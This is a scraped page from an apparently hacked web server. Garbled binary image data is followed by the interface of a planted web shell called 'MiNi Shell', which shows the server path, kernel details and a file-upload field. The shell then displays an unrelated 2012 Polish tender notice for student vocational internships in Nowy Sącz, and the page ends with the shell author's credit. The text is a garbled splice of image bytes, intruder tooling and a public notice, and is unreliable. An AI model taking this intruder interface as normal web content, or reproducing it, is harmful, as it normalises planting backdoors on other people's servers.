JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120618/207718-N-2012.html

<p class="kh_header"><b>Nowy Sącz: PCFE.272.24.2012 Organizacja praktyk zawodowych dla uczestników projektu pn.: Modernizacja kształcenia zawodowego w Małopolsce.</b><br>
<b>Numer ogłoszenia: 207718 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Funduszy Europejskich , ul. Barbackiego 89, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 547 67 36, faks 18 547 67 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcfe.powiat-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PCFE.272.24.2012 Organizacja praktyk zawodowych dla uczestników projektu pn.: Modernizacja kształcenia zawodowego w Małopolsce..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na organizacji praktyk zawodowych dla uczniów kształcących się w ponadgimnazjalnych szkołach zawodowych na terenie Powiatu Nowosądeckiego. Zamówienie realizowane jest w ramach projektu Nr WND-POKL.09.02.00-12-001/10 pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki.
A) Wymagania ogólne:
1) Praktyki zawodowe są organizowane w celu zastosowania i pogłębiania zdobytej wiedzy i umiejętności zawodowych w rzeczywistych warunkach pracy oraz w przyszłej pracy zawodowej.
2) Praktyki powinny odbywać się w zakładach/instytucjach sektora Małych i Średnich Przedsiębiorstw działających w branży gastronomicznej, hotelarskiej, leśnej, ogrodniczej, architektury krajobrazu, informatycznej lub turystycznej.
3) Instytucja(e)/zakład(y) przyjmująca/e na praktyki powinny być zlokalizowane na terenie powiatów: nowotarski, nowosądecki lub na terenie Miasta Nowy Sącz. Wybór lokalizacji podyktowany jest miejscem zamieszkania uczniów - beneficjentów praktyk.
4) Praktyką objętych zostanie maksymalnie 100 uczniów kształcących się w zawodach: kucharz, kelner, technik leśnik, informatyk, technik ochrony środowiska, technik hotelarstwa w technikach i zasadniczych szkołach zawodowych na terenie Powiatu Nowosądeckiego.
5) Wykonawca jest zobowiązany podzielić uczestników praktyk na grupy maksymalnie 5-osobowe. Praktyka każdej z grup powinna odbywać się w innej instytucji/zakładzie. Zamawiający dopuszcza odbywanie praktyk przez więcej niż jedną grupę w tym samym czasie w jednej instytucji/zakładzie, z tym jednak zastrzeżeniem, że praktyka każdej z grup będzie odbywać się w innym dziale tej instytucji/zakładu.
6) Czas trwania praktyki zawodowej dla 1 uczestnika praktyk wynosi 2 tygodnie (10 dni roboczych) w terminie lipiec - sierpień 2012. Praktyki muszą odbywać się w sposób ciągły. Zamawiający nie dopuszcza podziału praktyki na części.
7) Wymiar praktyk zawodowych wynosi 40 godzin tygodniowo (5 dni x 8 godzin). Praktyki odbywać się będą w dni robocze od poniedziałku do piątku. Praktyki mogą odbywać się w soboty po uzyskaniu zgody uczestnika praktyk. Praktyki nie mogą odbywać się w dni ustawowo wolne od pracy.
8) Praktyki muszą odbywać się w przedziale czasowym od 7.00 do 17.00, z zastrzeżeniem, że czas trwania praktyki jest nieprzerwany przez 8 godzin z uwzględnieniem przerw wynikających z przepisów obowiązujących w danym zakładzie pracy.
9) Zamawiający zastrzega sobie prawo do realizacji zamówienia w mniejszym zakresie  w przypadku rezygnacji uczestnika/ów. Zamawiający zobowiązuje się poinformować Wykonawcę o tym fakcie najpóźniej na 3 dni przed planowanym terminem rozpoczęcia danej praktyki.
Wykonawcy przysługuje wynagrodzenie za faktyczną liczbę uczestników praktyki zawodowej. W przypadku rezygnacji uczestnika w trakcie praktyki Wykonawcy przysługuje wynagrodzenie obliczone proporcjonalnie do ilości dni praktyk odbytych przez uczestnika, który zrezygnował z praktyk.
10)Wykonawca zobowiązany będzie w terminie 3 dni przed rozpoczęciem praktyk przedstawić do wiadomości Zamawiającego harmonogram praktyk.
B) Wymagania dotyczące zakwaterowania:
1) Wykonawca jest zobowiązany do zapewnienia uczestnikom zakwaterowania na czas praktyk w miejscu ich odbywania (dotyczy hoteli, pensjonatów itp.) lub w innym obiekcie położonym w odległości nie większej niż 10 km od miejsca odbywania praktyki.
2) Pokoje, w których zakwaterowani będą uczestnicy praktyk winny być maksymalnie 2-osobowe z pełnym węzłem sanitarnym (łazienka, ubikacja, ciepła woda) oraz winny znajdować się w obiekcie spełniającym wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określone przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska.
C) Wymagania dotyczące wyżywienia:
Wykonawca jest zobowiązany zapewnić uczestnikom na czas trwania praktyk wyżywienie (śniadanie, obiad dwudaniowy, kolacja). Wszystkie posiłki powinny być przygotowane zgodnie z normami i zaleceniami prawidłowego żywienia.
D) Wymagania dotyczące dojazdu i powrotu lub pokrycia kosztów dojazdu i powrotu:
1) Wykonawca jest zobowiązany zapewnić dojazd i powrót lub zwrot kosztów dojazdu 
i powrotu uczestników z miejsca zamieszkania do miejsca odbywania praktyki (dotyczy każdego weekendu).
2) W przypadku jeżeli uczestnik praktyki zostanie zakwaterowany w obiekcie innym niż miejsce odbywania praktyki, Wykonawca zapewnia dojazd i powrót lub pokrywa koszty dojazdu i powrotu uczestników z miejsca zakwaterowania do miejsca odbywania praktyki.
E) Wymagania dotyczące bezpieczeństwa oraz ubezpieczenia uczestników praktyk:
1) Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, realizując obowiązki wynikające z zawartej umowy zobowiązany jest do zapewnienia opieki i bezpieczeństwa uczestnikom praktyk.
2) Wykonawca zapewni ubezpieczenie NNW na czas przejazdów i odbywania praktyki dla każdego uczestnika.
3)Ubezpieczenie musi obejmować ochroną co najmniej koszty leczenia oraz następstwa nieszczęśliwych wypadków na kwotę minimum 10000,00 zł na osobę.
F) Wymagania dotyczące kadry:
1) Praktyki zawodowe winny być prowadzone pod kierunkiem opiekunów praktyk zawodowych, którymi mogą być pracodawcy, wyznaczeni przez nich pracownicy lub nauczyciele zawodu, posiadający kwalifikacje zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 15 grudnia 2010 r. w sprawie praktycznej nauki zawodu (Dz. U. Nr 244 poz. 1626).
2) Wykonawca pokryje koszty zatrudnienia opiekunów praktyk.
G)	Program praktyk:
1)	Cele, zadania i zakres tematyczny praktyk zostały określone w programach praktyk stanowiących załącznik do specyfikacji istotnych warunków zamówienia.
H) Pozostałe informacje i wymagania dotyczące realizacji przedmiotu zamówienia:
1) Instytucja(e)/zakład(y) przyjmująca/e uczestników na praktyczną naukę zawodu:
a)	zobowiązują się prowadzić praktykę zgodnie z programem praktyki, 
b)	zapewniają warunki materialne do realizacji praktycznej nauki zawodu, a w szczególności:
- stanowiska szkoleniowe wyposażone w niezbędne urządzenia, sprzęt, narzędzia, materiały i dokumentację techniczną, uwzględniające wymagania bezpieczeństwa i higieny pracy,
- środki higieny osobistej przysługujące na danym stanowisku pracy pracownikom, zgodnie z odrębnymi przepisami,
- pomieszczenia do przechowywania odzieży i obuwia roboczego oraz środków ochrony indywidualnej,
- nieodpłatne napoje przysługujące pracownikom na danym stanowisku pracy, zgodnie z odrębnymi przepisami,
- dostęp do urządzeń higieniczno-sanitarnych oraz pomieszczeń socjalno-bytowych;
c) zapoznają uczestników praktyk z zakresem powierzonych im obowiązków, organizacją pracy, regulaminem pracy, w szczególności w zakresie przestrzegania porządku i dyscypliny pracy, oraz z przepisami i zasadami bezpieczeństwa i higieny pracy,
d) nadzorują przebieg praktycznej nauki zawodu,
e) sporządzają, w razie wypadku podczas praktycznej nauki zawodu, dokumentację powypadkową,
f) powiadamiają Zamawiającego za pośrednictwem Wykonawcy o naruszeniu przez ucznia regulaminu pracy.
2) Zaliczenie praktyki powinno być potwierdzone przez opiekuna praktyk w dzienniczku praktyk. Ocena winna uwzględniać następujące kryteria: dyscyplina, samodzielność pracy, jakość wykonywanej pracy, przestrzeganie przepisów bezpieczeństwa i higieny pracy.
3) Wykonawca jest zobowiązany do zapewnienia wystawienia uczestnikom przez instytucję/zakład, w którym praktyka się odbyła zaświadczenia o odbyciu praktyki zawodowej. Wzór zaświadczenia o odbyciu praktyk Wykonawca uzgodni z Zamawiającym.
4) Wykonawca zamówienia oraz instytucja/zakład przyjmująca na praktykę nie może pobierać żadnych opłat od uczestników praktyk.
5) Wykonawca ma obowiązek niezwłocznego informowania Zamawiającego o wszelkich niepokojących przypadkach/zjawiskach dotyczących zachowania uczestników praktyk, w tym o przypadkach nieusprawiedliwionej nieobecności na praktykach.
6) Zamawiający zastrzega sobie prawo kontroli Wykonawcy na każdym etapie realizacji umowy.
7) Zamawiający zapewnia ubrania robocze dla uczestników praktyk zawodowych.
8) Zamówienie realizowane jest w ramach projektu pn.: Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki. Usługa jest w całości finansowana ze środków publicznych.
2. Szczegółowy opis przedmiotu zamówienia w specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.11.00.00-4, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i
oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 2 do
specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian w treści niniejszej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę. 
2. Zmiana umowy dotyczyć może wydłużenia terminu końcowego wykonania przedmiotu zamówienia, nie później jednak niż do dnia 15 września 2012r. 
3. Konieczność wydłużenia terminu końcowego wykonania przedmiotu zamówienia wynikać może z przyczyn losowych, zależnych od uczestników praktyk, niezależnych od Zamawiającego i niezawinionych przez Wykonawcę, w wyniku których niemożliwe będzie przeprowadzenie praktyk w terminie do dnia 31 sierpnia 2012 r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pcfe.powiat-ns.pl/index.php?id=61<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Funduszy Europejskich, 33-300 Nowy Sącz, ul. Barbackiego 89, Grzegorz Poręba.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 12:00, miejsce: Powiatowe Centrum Funduszy Europejskich, 33-300 Nowy Sącz, ul. Barbackiego 89, Dziennik Podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu Nr WND-POKL.09.02.00-12-001/10 pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com